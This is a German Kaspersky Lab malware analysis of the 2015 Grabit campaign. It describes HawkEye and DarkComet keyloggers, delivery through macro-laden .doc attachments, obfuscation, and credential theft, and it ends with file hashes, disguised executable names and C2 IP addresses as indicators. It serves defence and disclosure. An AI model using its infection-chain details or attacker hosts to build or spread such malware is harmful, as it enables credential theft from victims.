  Ido Naor       28 Mai 2015 | 11:00  MSK

Ihr Kommentar  

Vor nicht allzu langer Zeit wandten sich Kaspersky-Kunden in den USA an die Forscher von Kaspersky Lab mit der Bitte, einen neuen Malware-Typ zu untersuchen, den sie von den Servern ihrer Organisationen isolieren konnten. Die Malware nennt sich selbst Grabit und ist charakteristisch für ihre Vielseitigkeit und Wandlungsfähigkeit. Jedes Sample, das wir gefunden haben, unterschied sich in Größe und Aktivität von den anderen, doch der interne Name und andere Identifikatoren waren beunruhigend ähnlich. Der Zeitstempel scheint gültig zu sein und liegt dicht an der dokumentierten Infektionszeit. Unsere Studie bezieht sich auf eine Kampagne, die im späten Februar 2015 ihren Anfang nahm und Mitte März zu Ende ging. Als die Entwicklungsphase vermutlich abgeschlossen war, begann sich die Malware von Indien, den USA, Israel und anderen Ländern rund um den Globus auszubreiten.

All die Duzende von Samples, die wir zusammentragen konnten, wurden auf einem Windows 32bit Prozessor über das Microsoft .NET Framework (Visual Basic/C#) programmiert. Die Dateien wurden innerhalb eines Zeitraums von drei Tagen kompiliert, zwischen dem 7. und 9. März 2015. Die folgende Grafik illustriert, wie die Gruppe oder das Individuum die Samples erstellt hat, sowie die Größe jedes Samples, die Tageszeit, innerhalb derer es kompiliert wurde, und die Zeitspannen zwischen den jeweiligen Kompilierungen.

Zeitachse der Malware-Kompilierung

Das kleinste Sample (0.52 MB) und das größte (1.57 MB) wurden beide am selben Tag erstellt, was darauf hinweisen könnte, dass die Gruppe experimentierte, um bestimmte Funktionen, Packer und „toten Code“ zu testen.

Ein Blick auf die Grafik eröffnet auch einen interessanten Blick auf den modus operandi, da der Bedrohungsakteur durchgehend bemüht ist, eine Vielzahl von Samples zu erhalten mit unterschiedlichen Codegrößen und vermutlich komplexerer Obfuskation.

Neben den unterschiedlichen Größen, Aktivitäten und der Obfuskation wurde auch ein ernstzunehmender Verschlüsselungsalgorithmus in jedes der Samples implementiert. Der proprietäre obfuskierte String, die Methoden und Klassen machten die Analyse zu einer nicht zu unterschätzenden Herausforderung. Auch die ASLR (Adressverwürfelung) ist deaktiviert, was auf eine Open Source Fernsteuerungssoftware, ein RAT (remote administration tool), hinweisen könnte, oder sogar auf ein kommerzielles Framework, das die schädliche Software in eine gut geschriebene Struktur gepackt hat. Diese Methode ist als abschwächender Faktor für Bedrohungsakteure bekannt, die ihren Code vor den Augen der Analysten verbergen wollen.

Eine dynamische Analyse im Rahmen unserer Untersuchung hat gezeigt, dass die „Call-Home“-Funktion über ganz offensichtliche Kanäle kommuniziert und keinen Schritt zu viel unternimmt, um ihre Aktivität zu verbergen. Hinzu kommt, dass die Dateien selbst nicht so programmiert wurden, um irgendwelche Registrierungsmanöver zu unternehmen, die sie vor dem Windows Explorer verstecken würden. Wollte man einen Vergleich anstellen, so könnte man meinen, die Bedrohungsakteure schicken einen „schwachen Ritter in einer schweren Rüstung“ in den Krieg. Das bedeutet, dass wer auch immer die Malware programmiert hat, den Code nicht von Null auf geschrieben hat. Ein gut ausgebildeter Ritter würde niemals mit einem leuchtenden Schild und einem Stöckchen als Schwert in den Krieg ziehen.

Ein Blick in den “Call-Home”-Traffic zeigt, dass die Keylogger-Funktionalität Dateien bereitstellt, die als Container für Tastaturunterbrechungen dienen, Hostnamen sammeln sowie App-Namen, Nutzernamen und Passwörter. Der interessante Teil aber liegt hier.

Die Dateinamen enthalten einen sehr informativen String:

HawkEye_Keylogger_Execution_Confirmed_<VICTIM> 3.10.2015 6:08:31 PM

HawkEye ist ein kommerzielles Tool, das sich nun schon ein paar Jahre in der Entwicklungsphase befindet; es erschien im Jahr 2014, als eine Website mit dem Namen HawkEyeProducts, und es leistete einen bedeutenden Beitrag zur Hacker-Community.

Auf der Website demonstriert das Produkt eine große Vielseitigkeit, da es viele Arten von RATs enthält, Features und Funktionalitäten, wie etwa den traditionellen HawkEye Logger oder andere Arten von Remote Administration Tools wie etwa Cyborg Logger, CyberGate, DarkComet, NanoCore und andere. Es scheint drei Liefertypen zu unterstützen: FTP, SMTP und Web-Panel.

Wie man sehen konnte, verwendet die Malware eine Reihe von RATs, um seine Opfer zu kontrollieren oder ihre Aktivität zu verfolgen. Eine der erfolgreichen Implementierungen des Bedrohungsakteurs enthielt den wohlbekannten DarkComet. Diese bequeme “wähle-dein-RAT”-Funktionalität spielt eine sehr wichtige Rolle bei der Malware-Infektion, der Ausführung und dem Überleben auf dem Opferrechner. Die DarkComet-Samples sind komplexer als die traditionellen HawkEye-Logger. In einem Fall verfügte ein Sample über einen Generator für willkürliche Schlüssel, der einen Initialisierungsvektor für die ersten vier Bytes einer ausführbaren Datei einstellt und einen willkürlichen Schlüssel von 5 Byte anhängt, der eine weitere PE-Datei entpackt, die weniger als 20KB groß ist. Die PE-Datei enthält dann einen weiteren Packer mit einer noch komplexeren Obfuskationstechnik. Das letzte Sample, das wir untersucht haben, legte ein noch komplexeres Verhalten an den Tag. Der Code selbst hatte dieselbe Obfuskationstechnik, doch der Traffic wurde nicht in Klartext übertragen. Gestohlene Daten wurden gepackt und verschlüsselt über willkürliche http-Ports gesendet. Das bedeutet, dass die Gruppe versucht, andere Arten von schädlichen Samples mit unterschiedlichen RATs zu produzieren.

Ungefähr 10.000 gestohlene Dateien wurden zusammengetragen. In Thailand und Indien ansässige Unternehmen machten den größten Anteil an infizierten Rechnern aus. Mit einem Blick auf die gestohlenen Anmeldedaten wird klar, dass die Mitarbeiter sich die Malware gegenseitig zugeschickt haben, da die gestohlenen Hostnamen und internen Anwendungen gleich sind.

Hier die komplette Grafik, aktualisiert im Mai 2015:

Verteilung der Malware nach Ländern

Die Effizienz der simplen Keylogger demonstrierend, verwaltete ein C2 (am 15. Mai) tausende von Account-Daten der Opfer von hunderten von infizierten Systemen.

Zusammenfassend kann man sagen, dass die Grabit-Bedrohungsakteure keine raffinierten Umgehungen oder Manöver in ihrer dynamischen Aktivität verwendeten. Es ist interessant, die großen Unterschiede in den Kernstücken der Malware und der tatsächlichen Funktionalität zu sehen, die sie verwenden.

Einige Malware-Samples nutzten denselben Hosting-Server und sogar dieselben Anmeldedaten. Könnte es sein, dass unser Bedrohungsakteur es eilig hatte?

Unsere Vermutung ist, dass wir es mit einer Gruppe und nicht mit einem Individuum zu tun haben. Einige Mitglieder der Gruppe sind technisch versierter als andere, und andere sind eher sicherheitsorientiert und sich der Risiken bewusst, denen sie sich möglicherweise aussetzen.

Zurück auf Anfang:

Soweit wir bisher wissen, wird die Malware als E-Mail-Attachment im Format .doc (Microsoft Office Word) geliefert, das einen schädlichen Makro mit der Bezeichnung AutoOpen enthält. Dieser Macro baut einfach einen Socket über TCP auf und schickt eine http-Anfrage an einen entfernten Server, der von der Gruppe gehackt wurde, damit er als Malware-Netzknoten dient, bevor die Schadsoftware heruntergeladen wird. In einigen Fällen war das schädliche Makro Passwort geschützt, aber unser Bedrohungsakteur könnte vergessen haben, dass eine .doc-Datei tatsächlich ein Archiv ist und dass die Makro-Strings, wenn sie in einem beliebigen Editor unserer Wahl geöffnet werden, in Klartext dargestellt werden.

Die Malware ist deutlich sichtbar, modifiziert übliche Registry-Einträge, so wie Erstkonfigurationen, und verwischt seine Spuren nicht. Seine Binärdateien werden in den meisten Fällen nicht gelöscht und seine Kommunikation läuft in Klartext, so dass die Opfer die Kommunikation belauschen und die Anmeldedaten der FTP/SMTP-Server abfangen können.

Die Malware-Varianten sind hauptsächlich hier platziert:

C:\Users\<user>\AppData\Roaming\Microsoft

Phishing-Erweiterungen: .doc

3f77403a64a2dde60c4962a6752de601d56a621a

4E7765F3BF73AEC6E350F412B623C23D37964DFC

Icons: .pdf, .doc, .ttf, .xls, .ppt, .msg, .exe

Stealer: .txt, .jpeg, .eml

Zusätzliche Namen ausführbarer Dateien:

AudioEndpointBuilder.exe

BrokerInfrastructure.exe

WindowsUpdate.exe

Malware-Erweiterungen: .zip oder .exe

9b48a2e82d8a82c1717f135fa750ba774403e972b6edb2a522f9870bed57e72a

ea57da38870f0460f526b8504b5f4f1af3ee490ba8acfde4ad781a4e206a3d27

0b96811e4f4cfaa57fe47ebc369fdac7dfb4a900a2af8a07a7b3f513eb3e0dfa

1948f57cad96d37df95da2ee0057dd91dd4a9a67153efc278aa0736113f969e5

1d15003732430c004997f0df7cac7749ae10f992bea217a8da84e1c957143b1c

2049352f94a75978761a5367b01d486283aab1b7b94df7b08cf856f92352166b

26c6167dfcb7cda40621a952eac03b87a2f0dff1769ab9d09dafd09edc1a4c29

2e4507ff9e490f9137b73229cb0cd7b04b4dd88637890059eb1b90a757e99bcf

3928ea510a114ad0411a3528cd894f6b65f59e3d52532d3e0c35157b1de27651

710960677066beba4db33a62e59d069676ffce4a01e63dc968ad7446158f55d6

7371983a64ef9389bf3bfa8d2abacd3a909d13c3ee8b53cccf437026d5925df5

76ba61e510a340f8751e46449a7d857a2d242bd4724d0d040b060137ab5fb31a

78970883afe52e4ee846f4a7cf75b569f6e5a8e7a830d69358a8b33d186d6fec

7c8c3247ffeb269dbf840c7648e9bfaa8cf3d375a03066b57773c48de2b6d477

7f0c4d3644fdcd8ac5bc2e007bb5c3e9eab56a3d2d470bb796af88125cd74ac9

IP Adressen:

31.220.16.147

204.152.219.78

128.90.15.98

31.170.163.242

185.77.128.65

193.0.200.136

208.91.199.223

31.170.164.81

185.28.21.35

185.28.21.32

112.209.76.184


Nach oben  |  Archiv >>

 

Copyright © 1996 - 2015
Kaspersky Lab
Industry Leading Antivirus Software
Alle Rechte vorbehalten
 

Email: webmaster@kaspersky.com
Datenschutzbestimmungen